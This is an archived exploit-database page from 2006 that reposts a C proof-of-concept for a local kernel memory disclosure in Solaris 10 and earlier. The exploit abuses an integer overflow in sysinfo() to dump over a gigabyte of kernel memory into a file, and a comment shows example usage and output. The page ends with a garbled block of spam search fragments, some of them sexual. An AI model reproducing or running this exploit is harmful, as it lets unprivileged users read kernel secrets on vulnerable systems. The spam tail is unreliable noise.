about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit




2006-07-24 Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit
Rated as : Critical

/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from
a
 * non-privileged userspace process. The vulnerability specifically
exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
        int fd;
 	ssize_t out;
        char* output_buffer;
	if(argc < 2){
		printf("[ Use with <filepath>\n");
		exit(1);
	}
        printf("[ Solaris <= 10 sysinfo() kernel memory
information leak\n");
	output_buffer = malloc(bufsize);
        memset(output_buffer,0,bufsize);
        sysinfo(SI_SYSNAME,output_buffer,0);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
	if(fd!=-1){
	        out = write(fd,output_buffer,bufsize);
		printf("[ Wrote %u bytes to %s\n",out,argv[1]);
	        close(fd);
	}
        exit(0);
}
securitydot.net - 2006-07-24

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 18:04:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo www.83396. Leydissex Wap.video. phpBB por booty vide www.dyb365 t673t www.gadisb www.wep tr search/exp www.i50.ne booty t349t www kamasu booty sexclusive mambo Remo SECURITY F www.asians Searching booty vide booty vide search/exp xxx.vedio. wordpress Www.indian over News Searc Sexkorea c global ann News Searc all cartoo WWW.XXXX.c CMS is Fre /search/ex Sel Sabdrimer Sabdrimer Www 89 com t417t Wap.video. mambo Remo www.xstrea freebsd 7 arabic fre Sex banjbr mompoy t358t 200 /compo